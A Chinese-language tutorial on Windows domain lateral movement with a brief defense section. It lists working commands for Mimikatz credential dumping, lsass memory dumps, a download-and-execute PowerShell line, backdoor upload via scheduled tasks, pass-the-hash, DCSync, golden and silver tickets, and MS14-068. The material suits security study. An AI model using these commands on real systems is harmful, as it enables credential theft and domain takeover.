内网渗透技巧之横向控制教学文档<\/h1>

一、Windows域基础<\/h2>

1.1 域的概念与优势<\/h3>

域定义<\/strong>：将网络中多台计算机逻辑组织到一起进行集中管理的逻辑环境<\/li>
组成<\/strong>：域控制器(Domain Controller)和成员计算机<\/li>

活动目录(AD)<\/strong>：安装在域控制器上，存储网络对象信息并提供访问方法<\/li> <\/ul>
域的优势<\/strong>：<\/p>

集中管理：可管理分布各地的计算机和用户<\/li>
便捷资源访问：容易定位域中资源<\/li>
单点登录：一次登录访问整个网络资源<\/li>
可扩展性：适用于小型到跨国公司网络<\/li> <\/ol>
1.2 域渗透常用命令<\/h3>
查询域控制器主机名：net group "domain controllers" \/domain 查询域管理用户：net group "domain admins" \/domain 查看所有域用户：net user \/domain 查看域内所有计算机：net group "domain computers" \/domain 查看域密码策略：net accounts \/domain <\/code><\/pre> 二、Windows认证协议<\/h2> 2.1 NTLM认证协议<\/h3> 认证机制<\/strong>：基于挑战\/响应<\/p> <\/li> 认证流程<\/strong>：<\/p> 客户端发送用户名到服务器<\/li> 服务器生成随机挑战(Challenge)发送给客户端<\/li> 客户端用用户密码哈希加密挑战并返回响应(Response)<\/li> 服务器验证响应<\/li> <\/ol> <\/li> NTLM Hash存储<\/strong>：Windows本地存储在SAM文件中<\/p> administrator:500:6f08d7b306b1dad4ff17365faf1ffe89:032f3db689bf1ee44c04d08c785710de::: <\/code><\/pre> <\/li> <\/ul> 2.2 Kerberos认证协议<\/h3> 三方参与<\/strong>：客户端、服务端和KDC(Key Distribution Center)<\/li> 认证流程<\/strong>：客户端向AS(Authentication Service)认证身份<\/li> AS返回TGT(Ticket Granting Ticket)和SessionKey<\/li> 客户端使用TGT向TGS(Ticket Granting Service)请求服务票据<\/li> TGS返回服务票据和SessionKey<\/li> 客户端使用服务票据访问服务<\/li> <\/ol> <\/li> <\/ul> 三、横向移动技术<\/h2> 3.1 凭证窃取技术<\/h3> 3.1.1 Mimikatz<\/h4> 功能<\/strong>：从lsass.exe进程获取活动账号明文密码<\/li> 使用<\/strong>： mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" <\/code><\/pre> <\/li> Win10\/2012R2+明文密码获取<\/strong>： reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest \/v UseLogonCredential \/t REG_DWORD \/d 1 \/f <\/code><\/pre> <\/li> <\/ul> 3.1.2 Procdump+Mimikatz<\/h4> 转储lsass.exe内存： procdump64.exe -accepteula -ma lsass.exe lsass.dmp <\/code><\/pre> <\/li> 使用Mimikatz分析： mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" <\/code><\/pre> <\/li> <\/ol> 3.1.3 其他工具<\/h4> Getpass<\/strong>：直接获取明文密码<\/li> Powershell脚本<\/strong>： powershell IEX (New-Object Net.WebClient).DownloadString('https:\/\/raw.githubusercontent.com\/samratashok\/nishang\/master\/Gather\/Get-PassHashes.ps1');Get-PassHashes <\/code><\/pre> <\/li> <\/ul> 3.2 横向移动方法<\/h3> 3.2.1 IPC$+计划任务<\/h4> 建立IPC$连接： net use \\192.168.1.1\IPC$ \/user:"administrator" "password" <\/code><\/pre> <\/li> 上传后门： copy test.bat \\192.168.1.1\c$ <\/code><\/pre> <\/li> 创建计划任务： schtasks \/create \/s 192.168.1.1 \/u Administrator \/p password \/ru "SYSTEM" \/tn test \/sc DAILY \/st 22:18 \/tr C:\windows\temp\test.bat \/F schtasks \/run \/s 192.168.1.1 \/u administrator \/p password \/tn test \/i <\/code><\/pre> <\/li> <\/ol> 3.2.2 PsExec(445端口)<\/h4> 使用<\/strong>： psexec \\192.168.1.1 -u Domain\User -p Password Command <\/code><\/pre> <\/li> <\/ul> 3.2.3 WMI(135端口)<\/h4> 查询进程<\/strong>： wmic \/node:192.168.1.1 \/user:Administrator \/password:password process list brief <\/code><\/pre> <\/li> 创建进程<\/strong>： wmic \/node:192.168.1.1 \/user:Administrator \/password:password process call create "calc.exe" <\/code><\/pre> <\/li> <\/ul> 3.2.4 WinRM(5985\/5986端口)<\/h4> 执行命令<\/strong>： winrs -r:http:\/\/192.168.1.1:5985 -u:Administrator -p:password "whoami \/all" <\/code><\/pre> <\/li> <\/ul> 3.2.5 SmbExec(445端口)<\/h4> 使用<\/strong>： smbexec.py administrator:password@192.168.1.1 <\/code><\/pre> <\/li> <\/ul> 3.3 Pass The Hash(PTH)攻击<\/h3> Mimikatz实现<\/strong>： sekurlsa::pth \/domain:. \/user:Administrator \/ntlm:70be8675cd511daa9be4b8f49e829327 <\/code><\/pre> <\/li> <\/ul> 3.4 导出域成员Hash<\/h3> 3.4.1 使用ntdsutil导出NTDS.DIT<\/h4> 创建快照： ntdsutil snapshot "activate instance ntds" create quit quit <\/code><\/pre> <\/li> 加载快照： ntdsutil snapshot "mount {GUID}" quit quit <\/code><\/pre> <\/li> 复制文件： copy C:\$SNAP_...$\windows\NTDS\ntds.dit c:\ntds.dit <\/code><\/pre> <\/li> 使用impacket解析： python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL <\/code><\/pre> <\/li> <\/ol> 3.4.2 Mimikatz导出域Hash<\/h4> 直接导出<\/strong>： mimikatz log "privilege::debug" "lsadump::lsa \/patch" exit <\/code><\/pre> <\/li> DCSync技术<\/strong>： lsadump::dcsync \/domain:test.com \/all \/csv <\/code><\/pre> <\/li> <\/ul> 3.5 票据攻击<\/h3> 3.5.1 黄金票据(Golden Ticket)<\/h4> 获取krbtgt的Hash： lsadump::dcsync \/domain:xx.com \/user:krbtgt <\/code><\/pre> <\/li> 生成黄金票据： kerberos::golden \/admin:administrator \/domain:ABC.COM \/sid:S-1-5-21-... \/krbtgt:c7af5cfc450e645ed4c46daa78fe18da \/ticket:test.kiribi <\/code><\/pre> <\/li> 导入票据： kerberos::ptt test.kiribi <\/code><\/pre> <\/li> <\/ol> 3.5.2 白银票据(Silver Ticket)<\/h4> 导出服务账号Hash： mimikatz log "privilege::debug" "sekurlsa::logonpasswords" <\/code><\/pre> <\/li> 生成白银票据： kerberos::golden \/domain:ABC.COM \/sid:S-1-5-21-... \/target:DC.ABC.COM \/rc4:f3a76b2f3e5af8d2808734b8974acba9 \/service:cifs \/user:strage \/ptt <\/code><\/pre> <\/li> <\/ol> 3.6 MS14-068域提权<\/h3> 生成TGT： MS14-068.exe -u user@test.com -s SID -d 192.168.1.1 -p password <\/code><\/pre> <\/li> 导入票据： mimikatz.exe "kerberos::ptc TGT_user@test.com.ccache" exit <\/code><\/pre> <\/li> <\/ol> 四、防御建议<\/h2> 限制特权账户<\/strong>：减少域管理员账户数量和使用频率<\/li> 启用LSA保护<\/strong>：防止从lsass.exe提取凭据<\/li> 禁用NTLM<\/strong>：尽可能使用Kerberos认证<\/li> 监控异常活动<\/strong>：如异常的票据请求、大量的认证尝试等<\/li> 及时打补丁<\/strong>：修复如MS14-068等已知漏洞<\/li> 限制远程管理工具<\/strong>：严格控制PsExec、WMI等工具的使用<\/li> 启用Credential Guard<\/strong>：保护凭据不被窃取<\/li> <\/ol> 五、总结<\/h2> 内网横向移动是攻击者获取域控权限的关键阶段，涉及多种技术和工具。防御方应了解这些技术原理，采取分层防御措施，监控异常活动，才能有效保护内网安全。<\/p>